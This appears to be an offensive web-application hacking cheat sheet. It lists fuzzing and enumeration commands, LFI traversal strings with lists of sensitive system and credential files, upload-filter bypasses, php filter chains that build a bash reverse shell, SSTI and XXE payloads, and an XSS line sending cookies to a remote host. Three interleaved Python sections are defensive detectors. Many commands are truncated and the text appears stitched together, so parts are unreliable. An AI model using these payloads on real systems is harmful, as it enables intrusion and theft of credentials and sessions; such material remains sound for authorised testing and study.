
Web Application Analysis

Burp Suite

Ctrl+r // Sending request to repeater
Ctrl+i // Sending request to intruder
Ctrl+Shift+b // base64 encoding
Ctrl+Shift+u // URL decoding

Set Proxy Environment Variables

export HTTP_PROXY=https://tinyurl.com/3fjzq
export HTTPS_PROXY=https://tinyurl.com/4mk9oz

cadaver

cadaver http:///<WEBDAV_DIRECTORY>/

dav:/<WEBDAV_DIRECTORY>/> cd C
dav:/<WEBDAV_DIRECTORY>/C/> ls
dav:/<WEBDAV_DIRECTORY>/C/> put


Cross-Site Scripting (XSS)

alert(1)
alert('XSS');
alert(document.cookie)
document.querySelector('#foobar-title').textContent = '<TEXT>'
fetch('https://<RHOST>/steal?cookie=' + btoa(document.cookie));
user.changeEmail('user@domain');

ffuf

ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fs -
ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fw -
ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ -mc 200,204,301
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u h
ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http://<

API Fuzzing

ffuf -u https:///api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,4

Searching for LFI

ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://

Fuzzing with PHP Session ID

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercas

Recursion

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-smal

File Extensions

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-smal

Rate Limiting

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-smal

Virtual Host Discovery

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt

Massive File Extension Discovery

ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://<RHOST

GitTools


./gitdumper.sh http:///.git/ /PATH/TO/FOLDER
./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/

Gobuster

-e // extended mode that renders the full url
-k // skip ssl certificate validation
-r // follow redirects
-s // status codes
-b // exclude status codes
--wildcard // set wildcard option

$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u h
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://<RHOS
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http:/// -x php,txt,h
$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-lis

Common File Extensions

txt,bak,php,html,js,asp,aspx

Common Picture Extensions

png,jpg,jpeg,gif,bmp

POST Requests

gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-

DNS Recon

gobuster dns -d -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-t
gobuster dns -d -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdom

VHost Discovery

gobuster vhost -u -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subd
gobuster vhost -u -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subd

Specify User Agent

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u htt

Local File Inclusion (LFI)

http:///.php?file=
http:///.php?file=../../../../../../../../etc/passwd
http:////php?file=../../../../../../../../../../etc/passwd

Until PHP 5.3:

http:////php?file=../../../../../../../../../../etc/passwd%00

Null Byte

%00 0x00

Encoded Traversal Strings

../
..\
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
....\\
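As an added, defensive example (not part of this cheat sheet and not taken from any tool it lists), the Python below canonicalizes the traversal encodings from the list above (single and double percent encoding, overlong UTF-8 such as %c0%ae, %u escapes of fullwidth look-alikes, backslashes) and flags request paths that still carry a `../` or a null byte afterwards; it then shows the mitigation side, resolving a user-supplied path under a fixed root. The sample request paths are constructed for this example; `canonicalize`, `is_traversal`, `flag_requests` and `resolve_under_root` are names chosen here, not from any library.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample request paths (not taken from any real log). The first eight carry
# one of the traversal encodings from the list above, the last two are benign controls.
SAMPLE_PATHS = [
    "/index.php?file=../../../../etc/passwd",
    "/index.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd",          # single URL encoding
    "/index.php?file=%252e%252e%252fetc%252fpasswd",          # double URL encoding
    "/index.php?file=%c0%ae%c0%ae%c0%afetc%c0%afpasswd",      # overlong UTF-8 (invalid UTF-8)
    "/index.php?file=%uff0e%uff0e%u2215etc%u2215passwd",      # %u escapes of fullwidth '.' and '/'
    "/index.php?file=..././..././etc/passwd",                 # survives a filter that strips '../' once
    "/index.php?file=....\\\\....\\\\windows\\\\win.ini",     # backslash variant
    "/index.php?file=reports/2024.txt%00.php",                # null byte truncation
    "/index.php?file=reports/2024.txt",
    "/static/app.js",
]

_PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")
# Overlong two-byte UTF-8: lead byte C0/C1 followed by one continuation byte.
_OVERLONG = re.compile(r"%([cC][01])%([89aAbB][0-9a-fA-F])")
# Unicode look-alikes for '.', '/' and '\' that a byte-oriented filter will not recognise.
_HOMOGLYPHS = {"\uff0e": ".", "\uff0f": "/", "\uff3c": "\\", "\u2215": "/", "\u2216": "\\"}


def _decode_overlong(m: re.Match) -> str:
    lead, cont = int(m.group(1), 16), int(m.group(2), 16)
    return chr(((lead & 0x1F) << 6) | (cont & 0x3F))


def canonicalize(s: str, max_rounds: int = 4) -> str:
    """Decode until the string stops changing, so double encoding (%252e) unwraps fully.

    Overlong sequences are decoded by hand *before* unquote(), because unquote() would
    turn the invalid bytes C0 AE into U+FFFD and the traversal would be lost.
    """
    for _ in range(max_rounds):
        before = s
        s = _PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), s)
        s = _OVERLONG.sub(_decode_overlong, s)
        s = unquote(s, errors="replace")
        for glyph, plain in _HOMOGLYPHS.items():
            s = s.replace(glyph, plain)
        if s == before:
            break
    return s.replace("\\", "/")


def is_traversal(raw: str) -> bool:
    """Detection: a '../' (in any of the encodings above) or an embedded null byte."""
    canon = canonicalize(raw)
    return "../" in canon or "\x00" in canon


def flag_requests(paths):
    """Run the detector over a batch of request paths and return the flagged ones."""
    return [p for p in paths if is_traversal(p)]


def resolve_under_root(root: str, user_path: str):
    """Mitigation: resolve the decoded path under a fixed directory; None if it escapes.

    posixpath is used so the check is deterministic and does not touch the file system.
    """
    canon = canonicalize(user_path)
    if "\x00" in canon:
        return None
    root = posixpath.normpath(root)
    target = posixpath.normpath(posixpath.join(root, canon.lstrip("/")))
    if target == root or target.startswith(root + "/"):
        return target
    return None


if __name__ == "__main__":
    for path in SAMPLE_PATHS:
        print(("FLAG  " if is_traversal(path) else "ok    ") + path)
    print(resolve_under_root("/var/www/uploads", "reports/2024.txt"))
    print(resolve_under_root("/var/www/uploads", "%2e%2e/%2e%2e/etc/passwd"))
```

The point of decoding in a loop is that a single `unquote()` pass leaves `%252e%252e%252f` as `%2e%2e%2f`, which a substring filter for `../` never sees; the `..././` entry shows why the check must run on the fully decoded string rather than strip `../` once and move on.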

php://filter Wrapper

[Link 1](https://tinyurl.com/yux6oqdu)
[Link 2](https://tinyurl.com/y4ezgl4c/tree/master/File%20Inclusion)
[Link 3](https://tinyurl.com/y4ezgl4c/tree/master/File%20Inclusion#wrapper-phpfilter)
url=php://filter/convert.base64-encode/resource=file:////var/www//api.php
http:///index.php?page=php://filter/convert.base64-encode/resource=index
http:///index.php?page=php://filter/convert.base64-encode/resource=/etc/pass
base64 -d .php

Django, Rails, or Node.js Web Application Header Values

Accept: ../../../../.././../../../../etc/passwd{{
Accept: ../../../../.././../../../../etc/passwd{%0D
Accept: ../../../../.././../../../../etc/passwd{%0A
Accept: ../../../../.././../../../../etc/passwd{%00
Accept: ../../../../.././../../../../etc/passwd{%0D{{
Accept: ../../../../.././../../../../etc/passwd{%0A{{
Accept: ../../../../.././../../../../etc/passwd{%00{{

Linux Files

/etc/passwd /etc/shadow /etc/aliases /etc/anacrontab /etc/apache2/apache2.conf /etc/apache2/httpd.conf /etc/apache2/sites-enabled/000-default.conf /etc/at.allow

/etc/at.deny /etc/bashrc /etc/bootptab /etc/chrootUsers /etc/chttp.conf /etc/cron.allow /etc/cron.deny /etc/crontab /etc/cups/cupsd.conf /etc/exports /etc/fstab /etc/ftpaccess /etc/ftpchroot /etc/ftphosts /etc/groups /etc/grub.conf /etc/hosts /etc/hosts.allow /etc/hosts.deny /etc/httpd/access.conf /etc/httpd/conf/httpd.conf /etc/httpd/httpd.conf /etc/httpd/logs/access_log /etc/httpd/logs/access.log /etc/httpd/logs/error_log /etc/httpd/logs/error.log /etc/httpd/php.ini /etc/httpd/srm.conf /etc/inetd.conf /etc/inittab /etc/issue /etc/knockd.conf /etc/lighttpd.conf /etc/lilo.conf /etc/logrotate.d/ftp /etc/logrotate.d/proftpd /etc/logrotate.d/vsftpd.log /etc/lsb-release /etc/motd /etc/modules.conf /etc/motd /etc/mtab /etc/my.cnf /etc/my.conf /etc/mysql/my.cnf /etc/network/interfaces /etc/networks /etc/npasswd

/etc/passwd /etc/php4.4/fcgi/php.ini /etc/php4/apache2/php.ini /etc/php4/apache/php.ini /etc/php4/cgi/php.ini /etc/php4/apache2/php.ini /etc/php5/apache2/php.ini /etc/php5/apache/php.ini /etc/php/apache2/php.ini /etc/php/apache/php.ini /etc/php/cgi/php.ini /etc/php.ini /etc/php/php4/php.ini /etc/php/php.ini /etc/printcap /etc/profile /etc/proftp.conf /etc/proftpd/proftpd.conf /etc/pure-ftpd.conf /etc/pureftpd.passwd /etc/pureftpd.pdb /etc/pure-ftpd/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.pdb /etc/pure-ftpd/putreftpd.pdb /etc/redhat-release /etc/resolv.conf /etc/samba/smb.conf /etc/snmpd.conf /etc/ssh/ssh_config /etc/ssh/sshd_config /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_dsa_key.pub /etc/ssh/ssh_host_key /etc/ssh/ssh_host_key.pub /etc/sysconfig/network /etc/syslog.conf /etc/termcap /etc/vhcs2/proftpd/proftpd.conf /etc/vsftpd.chroot_list /etc/vsftpd.conf /etc/vsftpd/vsftpd.conf /etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftpusers /logs/pure-ftpd.log /logs/security_debug_log /logs/security_log /opt/lampp/etc/httpd.conf

/opt/xampp/etc/php.ini /proc/cmdline /proc/cpuinfo /proc/filesystems /proc/interrupts /proc/ioports /proc/meminfo /proc/modules /proc/mounts /proc/net/arp /proc/net/tcp /proc/net/udp /proc//cmdline /proc//maps /proc/sched_debug /proc/self/cwd/app.py /proc/self/environ /proc/self/net/arp /proc/stat /proc/swaps /proc/version /root/anaconda-ks.cfg /usr/etc/pure-ftpd.conf /usr/lib/php.ini /usr/lib/php/php.ini /usr/local/apache/conf/modsec.conf /usr/local/apache/conf/php.ini /usr/local/apache/log /usr/local/apache/logs /usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /usr/local/apache/audit_log /usr/local/apache/error_log /usr/local/apache/error.log /usr/local/cpanel/logs /usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log /usr/local/cpanel/logs/stats_log /usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log /usr/local/etc/php.ini /usr/local/etc/pure-ftpd.conf /usr/local/etc/pureftpd.pdb /usr/local/lib/php.ini /usr/local/php4/httpd.conf /usr/local/php4/httpd.conf.php

/usr/local/php4/lib/php.ini /usr/local/php5/httpd.conf /usr/local/php5/httpd.conf.php /usr/local/php5/lib/php.ini /usr/local/php/httpd.conf /usr/local/php/httpd.conf.ini /usr/local/php/lib/php.ini /usr/local/pureftpd/etc/pure-ftpd.conf /usr/local/pureftpd/etc/pureftpd.pdn /usr/local/pureftpd/sbin/pure-config.pl /usr/local/www/logs/httpd_log /usr/local/Zend/etc/php.ini /usr/sbin/pure-config.pl /var/adm/log/xferlog /var/apache2/config.inc /var/apache/logs/access_log /var/apache/logs/error_log /var/cpanel/cpanel.config /var/lib/mysql/my.cnf /var/lib/mysql/mysql/user.MYD /var/local/www/conf/php.ini /var/log/apache2/access_log /var/log/apache2/access.log /var/log/apache2/error_log /var/log/apache2/error.log /var/log/apache/access_log /var/log/apache/access.log /var/log/apache/error_log /var/log/apache/error.log /var/log/apache-ssl/access.log /var/log/apache-ssl/error.log /var/log/auth.log /var/log/boot /var/htmp /var/log/chttp.log /var/log/cups/error.log /var/log/daemon.log /var/log/debug /var/log/dmesg /var/log/dpkg.log /var/log/exim_mainlog /var/log/exim/mainlog /var/log/exim_paniclog /var/log/exim.paniclog /var/log/exim_rejectlog /var/log/exim/rejectlog /var/log/faillog /var/log/ftplog

/var/log/ftp-proxy /var/log/ftp-proxy/ftp-proxy.log /var/log/httpd-access.log /var/log/httpd/access_log /var/log/httpd/access.log /var/log/httpd/error_log /var/log/httpd/error.log /var/log/httpsd/ssl.access_log /var/log/httpsd/ssl_log /var/log/kern.log /var/log/lastlog /var/log/lighttpd/access.log /var/log/lighttpd/error.log /var/log/lighttpd/lighttpd.access.log /var/log/lighttpd/lighttpd.error.log /var/log/mail.info /var/log/mail.log /var/log/maillog /var/log/mail.warn /var/log/message /var/log/messages /var/log/mysqlderror.log /var/log/mysql.log /var/log/mysql/mysql-bin.log /var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/log/proftpd /var/log/pureftpd.log /var/log/pure-ftpd/pure-ftpd.log /var/log/secure /var/log/vsftpd.log /var/log/wtmp /var/log/xferlog /var/log/yum.log /var/mysql.log /var/run/utmp /var/spool/cron/crontabs/root /var/webmin/miniserv.log /var/www/html/__init__.py /var/www/html/db_connect.php /var/www/html/utils.php /var/www/log/access_log /var/www/log/error_log /var/www/logs/access_log /var/www/logs/error_log /var/www/logs/access.log /var/www/logs/error.log ~/.atfp_history

~/.bash_history ~/.bash_logout ~/.bash_profile ~/.bashrc ~/.gtkrc ~/.login ~/.logout ~/.mysql_history ~/.nano_history ~/.php_history ~/.profile ~/.ssh/authorized_keys ~/.ssh/id_dsa ~/.ssh/id_dsa.pub ~/.ssh/id_rsa ~/.ssh/id_rsa.pub ~/.ssh/identity ~/.ssh/identity.pub ~/.viminfo ~/.wm_style ~/.Xdefaults ~/.xinitrc ~/.Xresources ~/.xsession

Windows Files

C:/Users/Administrator/NTUser.dat C:/Documents and Settings/Administrator/NTUser.dat C:/apache/logs/access.log C:/apache/logs/error.log C:/apache/php/php.ini C:/boot.ini C:/inetpub/wwwroot/global.asa C:/MySQL/data/hostname.err C:/MySQL/data/mysql.err C:/MySQL/data/mysql.log C:/MySQL/my.cnf C:/MySQL/my.ini C:/php4/php.ini C:/php5/php.ini C:/php/php.ini C:/Program Files/Apache Group/Apache2/conf/httpd.conf C:/Program Files/Apache Group/Apache/conf/httpd.conf C:/Program Files/Apache Group/Apache/logs/access.log C:/Program Files/Apache Group/Apache/logs/error.log

C:/Program Files/FileZilla Server/FileZilla Server.xml C:/Program Files/MySQL/data/hostname.err C:/Program Files/MySQL/data/mysql-bin.log C:/Program Files/MySQL/data/mysql.err C:/Program Files/MySQL/data/mysql.log C:/Program Files/MySQL/my.ini C:/Program Files/MySQL/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log C:/Program Files/MySQL/MySQL Server 5.0/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/my.ini C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/access.log C:/Program Files (x86)/Apache Group/Apache/conf/error.log C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml C:/Program Files (x86)/xampp/apache/conf/httpd.conf C:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM C:/Windows/repair/system C:/Windows/repair/software C:/Windows/repair/security C:/WINDOWS/System32/drivers/etc/hosts C:/Windows/win.ini C:/WINNT/php.ini C:/WINNT/win.ini C:/xampp/apache/bin/php.ini C:/xampp/apache/logs/access.log C:/xampp/apache/logs/error.log C:/Windows/Panther/Unattend/Unattended.xml C:/Windows/Panther/Unattended.xml C:/Windows/debug/NetSetup.log C:/Windows/system32/config/AppEvent.Evt C:/Windows/system32/config/SecEvent.Evt C:/Windows/system32/config/default.sav C:/Windows/system32/config/security.sav C:/Windows/system32/config/software.sav C:/Windows/system32/config/system.sav C:/Windows/system32/config/regback/default C:/Windows/system32/config/regback/sam C:/Windows/system32/config/regback/security C:/Windows/system32/config/regback/system C:/Windows/system32/config/regback/software C:/Program Files/MySQL/MySQL Server 5.1/my.ini C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml C:/Windows/System32/inetsrv/config/applicationHost.config

C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log

PDF PHP Inclusion

Create a file with a PDF header, which contains PHP code.

%PDF-1.4
http:///index.php?page=uploads/.pdf%00&cmd=whoami

PHP Upload Filter Bypasses

.sh .cgi .inc .txt .pht .phtml .phP .Php .php3 .php4 .php5 .php7 .pht .phps .phar .phpt .pgif .phtml .phtm .php%00.jpeg

.php%20 .php%0d%0a.jpg .php%0a .php.jpg

.php%00.gif .php\x00.gif .php%00.png .php\x00.png .php%00.jpg .php\x00.jpg mv .jpg .php\x00.jpg
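As an added, defensive example (not part of this cheat sheet), the Python below contrasts the kind of extension block-list that the names above defeat with a hardened upload check: decode the name, reject control bytes and path separators, require exactly one extension from an allow-list, and verify the file's leading bytes match that type. The file names are taken from the bypass list above; the file contents and the function names `naive_allows`, `hardened_allows` and `audit` are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample uploads: names from the bypass list above, contents made up here.
PHP_CONTENT = b"<?php phpinfo(); ?>"
PNG_CONTENT = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
BYPASS_NAMES = [
    "shell.phP",            # case variation
    "shell.php5",           # alternate PHP extension
    "shell.phtml",
    "shell.php%20",         # trailing space, dropped by the file system
    "shell.php.jpg",        # double extension
    "shell.php%00.jpg",     # null byte truncation
    "shell.php%0d%0a.jpg",  # CRLF inside the name
]

# Allow-list of extensions, each with the leading bytes a file of that type must start with.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Exactly one dot, so a name can carry only one extension.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}")


def naive_allows(filename: str) -> bool:
    """Weak check: block-list on a literal '.php' suffix. Every name in BYPASS_NAMES passes."""
    return not filename.endswith(".php")


def hardened_allows(filename: str, content: bytes) -> bool:
    """Hardened check: decode, reject control bytes and path separators, require one
    allow-listed extension, and confirm the content's magic bytes match that extension."""
    name = unquote(filename)
    if any(ord(ch) < 0x20 for ch in name) or "/" in name or "\\" in name:
        return False                      # %00, %0d%0a, path components
    name = name.strip()                   # trailing space from .php%20
    if not _SAFE_NAME.fullmatch(name):    # rejects shell.php.jpg and odd characters
        return False
    ext = name.rsplit(".", 1)[1].lower()  # case-fold so .phP and .PNG are treated alike
    if ext not in ALLOWED:
        return False
    return content.startswith(ALLOWED[ext])


def audit(names, content):
    """Compare both checks over a batch: {name: (naive_result, hardened_result)}."""
    return {n: (naive_allows(n), hardened_allows(n, content)) for n in names}


if __name__ == "__main__":
    for name, (weak, strong) in audit(BYPASS_NAMES, PHP_CONTENT).items():
        print(f"{name:24} naive={weak!s:5} hardened={strong}")
    print("photo.png", hardened_allows("photo.png", PNG_CONTENT))
```

Even with this check, the stored file should get a server-generated name and live outside the web root or in a directory where the web server does not execute scripts; the name check only limits what reaches that directory.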

PHP Filter Chain Generator

python3 php_filter_chain_generator.py --chain ''
python3 php_filter_chain_generator.py --chain ""
python3 php_filter_chain_generator.py --chain """"""
python3 php_filter_chain_generator.py --chain """"<?php exec(""/bin/bash -c 'bash -
python3 php_filter_chain_generator.py --chain """"<?php exec(""/bin/bash -c 'bash -
http:///?page=php://filter/convert.base64-decode/resource=PD9waHAgZWNobyBzaG
python3 php_filter_chain_generator.py --chain ''
[+] The following gadget chain will generate the following code : <?= exec($_GET[0]
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|<--- SNIP --->|co

PHP Generic Gadget Chains (PHPGGC)

phpggc -u --fast-destruct Guzzle/FW1 /dev/shm/.txt /PATH/TO/FILE/.txt

Server-Side Request Forgery (SSRF)

https:///item/2?server=server./file?id=9&x=

Server-Side Template Injection (SSTI)

Fuzz String

${{<%[%'"}}%

Magic Payload

{{ ''.__class__.__mro__[1].__subclasses__() }}

Upload Vulnerabilities

ASP / ASPX / PHP / PHP3 / PHP5: Webshell / Remote Code Execution
SVG: Stored XSS / Server-Side Request Forgery
GIF: Stored XSS
CSV: CSV Injection
XML: XXE
AVI: Local File Inclusion / Server-Side Request Forgery
HTML/JS: HTML Injection / XSS / Open Redirect
PNG / JPEG: Pixel Flood Attack
ZIP: Remote Code Execution via Local File Inclusion
PDF / PPTX: Server-Side Request Forgery / Blind XXE

wfuzz

wfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http:///FUZZ/.ph

Write to File

wfuzz -w /PATH/TO/WORDLIST -c -f -u http:// --hc 403,404

Custom Scan with limited Output

wfuzz -w /PATH/TO/WORDLIST -u http:///dev/304c0c90fbc6520610abbf378e2339d1/d

Fuzzing two Parameters at once

wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://<RHOST>

Domain

wfuzz --hh 0 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -

Subdomain

wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -

Git

wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http://

Login

wfuzz -X POST -u "http://:/login.php" -d "email=FUZZ&password=<PASSWORD>"
wfuzz -X POST -u "http://:/login.php" -d "username=FUZZ&password=<PASSWORD>"

SQL

wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=<FUZZ>'

DNS

wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ."
wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ."

Numbering Files

wfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 https://

Enumerating PIDs

wfuzz -u 'https://<URL>' -z range,900-1000

WPScan

wpscan --url https:// --enumerate u,t,p
wpscan --url https:// --plugins-detection aggressive
wpscan --url https:// --disable-tls-checks
wpscan --url https:// --disable-tls-checks --enumerate u,t,p
wpscan --url http:// -U -P passwords.txt -t 50

XML External Entity (XXE)

Skeleton Payload Request

GET / HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 136

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://<HOST>:80/shell.php">]>

&xxe;

Payloads

&passwd;
username=%26username%3b&version=1.0.0--><!DOCTYPE+username+[+<!ENTITY+username+SYST
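As an added, defensive example (not part of this cheat sheet), the Python below shows the check a service receiving XML bodies like the one above can apply: parse with the standard-library expat parser and abort the moment a `<!DOCTYPE` appears, which happens before any `<!ENTITY>` in the internal subset is read, so no entity can be declared, let alone resolved. The two request bodies are constructed for the example (the `<HOST>` placeholder mirrors the skeleton request); `parse_without_dtd`, `is_rejected` and `DtdRejected` are names chosen here.

```python
import xml.parsers.expat

# Constructed sample bodies for the example; <HOST> is a placeholder as in the request above.
BENIGN_BODY = b"<login><username>alice</username><version>1.0.0</version></login>"
XXE_BODY = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://<HOST>:80/shell.php">]>'
    b"<login><username>&xxe;</username><version>1.0.0</version></login>"
)


class DtdRejected(ValueError):
    """Raised as soon as the parser sees a DOCTYPE, before any entity is declared or expanded."""


def parse_without_dtd(data: bytes) -> dict:
    """Parse a flat XML document into {element_name: text}, refusing any DTD.

    expat invokes StartDoctypeDeclHandler at the '<!DOCTYPE' token, i.e. before the
    internal subset with its <!ENTITY ...> declarations is read, so raising there stops
    the parse before an external entity could be fetched.
    """
    parser = xml.parsers.expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected(f"DOCTYPE {name!r} not accepted")

    fields, stack = {}, []

    def start(name, attrs):
        stack.append(name)
        fields.setdefault(name, "")

    def end(name):
        stack.pop()

    def chars(text):
        if stack:
            fields[stack[-1]] += text

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(data, True)
    return fields


def is_rejected(data: bytes) -> bool:
    """True when the body is refused because it carries a DTD."""
    try:
        parse_without_dtd(data)
    except DtdRejected:
        return True
    return False


if __name__ == "__main__":
    print(parse_without_dtd(BENIGN_BODY))
    print("XXE body rejected:", is_rejected(XXE_BODY))
```

Rejecting the DTD outright is simpler to reason about than trying to distinguish harmless from harmful entity declarations; a second line of defence is to log every rejected body with its source, since a DOCTYPE in a request to an endpoint that never needs one is itself a useful detection signal.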